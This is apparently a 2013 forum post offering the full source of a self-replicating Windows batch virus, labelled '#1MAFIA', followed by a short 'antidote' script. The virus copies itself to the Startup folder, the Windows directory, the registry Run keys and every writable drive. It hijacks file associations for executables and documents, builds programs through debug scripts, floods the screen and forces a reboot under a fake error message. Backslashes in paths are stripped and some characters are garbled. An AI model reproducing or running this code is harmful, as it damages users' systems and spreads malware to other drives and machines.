THE #1MAFIA VIRUS PLUS THE ANTIDOTE BY: ATOMIC_BIOS ##START OF VIRUS @::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= @::ANTI-SP2 EXPLOIT @::USE .CMD AS EXTENSION @::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= @exit @echo off echo +----------------------+ [...Testing 123...] echo ³SUCCESSFULLY LOADED!!!³ [...USED FOR TESTING...] echo +----------------------+ [...USED FOR TESTING...] ::SLOWS KEYBOARD mode CON: RATE=0 DELAY=99 ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= ::ver | find /I " XP" ::if errorlevel 1 TEST FOR WINDOWS VERSION ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= ::THIS DEBUG SCRIPT GETS A RANDOM ## FROM 1 TO 3 echo E 100 E8 1E 0 50 E8 39 0 5A 31 D0 31 D2 8B E 63 1 >rand.scr echo E 110 89 E 61 1 F7 F1 42 89 16 61 1 B4 4C 88 D0 CD >>rand.scr echo E 120 21 80 3E 67 1 0 E8 17 0 A3 65 1 C6 6 67 1 >>rand.scr echo E 130 1 A1 65 1 B9 55 62 F7 E1 5 19 36 A3 65 1 C3 >>rand.scr echo E 140 30 E4 CD 1A 89 D3 31 CB 88 D1 80 E1 F D3 CB B4 >>rand.scr echo E 150 2 CD 1A 89 D0 31 C8 88 F1 80 E1 F D3 C8 31 D8 >>rand.scr echo E 160 C3 0 0 3 0 0 0 0 >>rand.scr echo N rand >>rand.scr echo RCX >>rand.scr echo 68 >>rand.scr echo W >>rand.scr echo Q >>rand.scr debug < rand.scr ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= ::TURN THE SCREW rand SET RANDO=%ERRORLEVEL% if %RANDO%==1 SET FNAME=notice if %RANDO%==2 SET FNAME=readme if %RANDO%==3 SET FNAME=guru ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= del rand.scr del rand ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= ::EASY CONFIG HERE SET VOLUME=WoW SET SECONDS=60 SET MESSAGE="Invalid media reading drive C:" SET LOOP1=6 SET LOOP2=6 ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= set itself=%0 if not exist %itself% set itself=%0.cmd ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= copy /Y %itself% "c:Documents and SettingsAll UsersStart MenuProgramsStartup">nul ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= copy /Y %itself% c:windows\%FNAME%.cmd>nul copy /Y %itself% c:default.cmd>nul ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= md c: rash.can md c: rash.can¼º¸·¶µ.±‘’ copy /Y %itself% c: rash.can>nul for %%a in (p:;q:;r:;s:;t:;u:;v:;w:;x:;y:;z:) do subst %%a c: rash.can>nul ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= ECHO REGEDIT4>BUZZ ECHO.>>BUZZ ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>>BUZZ ECHO "MyReg1"="cmd /c c:default.cmd">>BUZZ REGEDIT /S /C BUZZ ECHO REGEDIT4>BUZZ ECHO.>>BUZZ ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>>BUZZ ECHO "MyReg2"="cmd /c narrator">>BUZZ REGEDIT /S /C BUZZ ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= ::LOAD VIRUS "BEFORE" THESE... ASSOC .EXE=ExeScript>nul FTYPE ExeScript=c:windows\%FNAME%.cmd "%%1" %*>nul ASSOC .ZIP=ZipScript>nul FTYPE ZipScript=c:windows\%FNAME%.cmd "%%1" %*>nul ASSOC .BAT=BatScript>nul FTYPE BatScript=c:windows\%FNAME%.cmd "%%1" %*>nul ASSOC .COM=ComScript>nul FTYPE ComScript=c:windows\%FNAME%.cmd "%%1" %*>nul ASSOC .TXT=TxtScript>nul FTYPE TxtScript=c:windows\%FNAME%.cmd "%%1" %*>nul ASSOC .DOC=DocScript>nul FTYPE DocScript=c:windows\%FNAME%.cmd "%%1" %*>nul ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= ::TEST IF "EACH" DRIVE IS WRITEABLE label %VOLUME%>nul if NOT errorlevel 1 copy /Y %itself% %FNAME%.cmd>nul label %VOLUME%>nul if NOT errorlevel 1 copy /Y %itself% %1.cmd>nul label a:%VOLUME%>nul if NOT errorlevel 1 copy /Y %itself% a:>nul label b:%VOLUME%>nul if NOT errorlevel 1 copy /Y %itself% b:>nul label c:%VOLUME%>nul if NOT errorlevel 1 copy /Y %itself% c:>nul label d:%VOLUME%>nul if NOT errorlevel 1 copy /Y %itself% d:>nul label e:%VOLUME%>nul if NOT errorlevel 1 copy /Y %itself% e:>nul label f:%VOLUME%>nul if NOT errorlevel 1 copy /Y %itself% f:>nul label g:%VOLUME%>nul if NOT errorlevel 1 copy /Y %itself% g:>nul ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= echo "%1">seed find /I ".exe" seed>nul if NOT errorlevel 1 goto execute find /I ".bat" seed>nul if NOT errorlevel 1 goto execute find /I "" seed>nul if NOT errorlevel 1 goto execute find /I ".txt" seed>nul if NOT errorlevel 1 goto manuals find /I ".doc" seed>nul if NOT errorlevel 1 goto manuals if exist seed del seed ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= ::THIS DEBUG SCRIPT IS A GRAPHICS IMAGE echo E 100 E 1F B8 0 F8 8E D8 B8 0 A0 8E C0 B8 11 0 CD >shum.scr echo E 110 10 FD BE FF FF BF FF FF B9 FF FF F3 A4 B0 46 E6 >>shum.scr echo E 120 43 E4 61 C 3 E6 61 BA D4 3 BB 0 0 AC 24 1F >>shum.scr echo E 130 C 5 E6 42 B0 C 8A E7 EF FE C0 8A E3 EE 81 C3 >>shum.scr echo E 140 7 87 B4 1 CD 16 74 E5 B4 0 CD 16 3C 1B 75 DD >>shum.scr echo E 150 B8 3 0 CD 10 E4 61 24 FC E6 61 B4 4C CD 21 E4 >>shum.scr echo E 160 E0 >>shum.scr echo N shum >>shum.scr echo RCX >>shum.scr echo 61 >>shum.scr echo W >>shum.scr echo Q >>shum.scr debug < shum.scr FOR /L %%a IN (1,1,%LOOP1%) DO do start /MAX shum if exist shum.scr del shum.scr shutdown -r -f -t %SECONDS% -c %MESSAGE% @exit ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= :execute start /max cmd /C "%1 %2 %3 %4 %5 %6 %7 %8" for %%a in (þV‹r£S1;þVŒr£s2;þv‹ršS3;þVR£s4;þv‹R£S5;þvŒR£S6;) do md %%a for %%a in (þDˆ„Ëh1;þdä†ÂH2;þdˆ„Ëh3;þdî†Ëh4;þDä„Ëh5;þdˆƒËh6;) do md %%a for %%a in (þ†á˜ss1;þ†áYSS2;þ†áYsS3;þƒáYsS4;þ†áYsS5;þ„áySS6;) do md %%a if exist seed del seed @exit ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= :manuals "%ProgramFiles%Windows NTAccessoriesWORDPAD.EXE" %1 ::DUMP EXE FILES TO SCREEN for %%a in (1;2;3;) do START /MAX CMD /C for /R c:windows %%b in (*.EXE) do type %%b if exist seed del seed goto garb ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= :garb ::DESKTOP GARBAGE PAYLOAD FOR /L %%a IN (1,1,%LOOP2%) DO copy %itself% "c:Documents and SettingsAll UsersDesktop\%%a_%1.cmd" @exit ::=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-= ##END OF VIRUS ##START OF ANTIDOTE FTYPE ExeScript="" FTYPE ZipScript="" FTYPE BatScript="" FTYPE ComScript="" FTYPE TxtScript="" FTYPE DocScript="" ASSOC .exe=exefile FTYPE exefile="%%1" %* ASSOC .bat=batfile FTYPE batfile="%%1" %* ASSOC =comfile FTYPE comfile="%%1" %* ASSOC .txt=txtfile FTYPE txtfile=%%SystemRoot%%system32NOTEPAD.EXE %%1 ASSOC .doc=WordPad.Document.1 FTYPE Wordpad.Document.1="%%ProgramFiles%%Windows NTAccessoriesWORDPAD.EXE" "%%1" for %%a in (p:;q:;r:;s:;t:;u:;v:;w:;x:;y:;z:) do subst %%a /D del "c:Documents and SettingsAll UsersStart MenuProgramsStartup*.cmd" ##END OF ANTIDOTE
Posted on: Tue, 16 Jul 2013 02:14:34 +0000
Trending Topics
Recently Viewed Topics
© 2015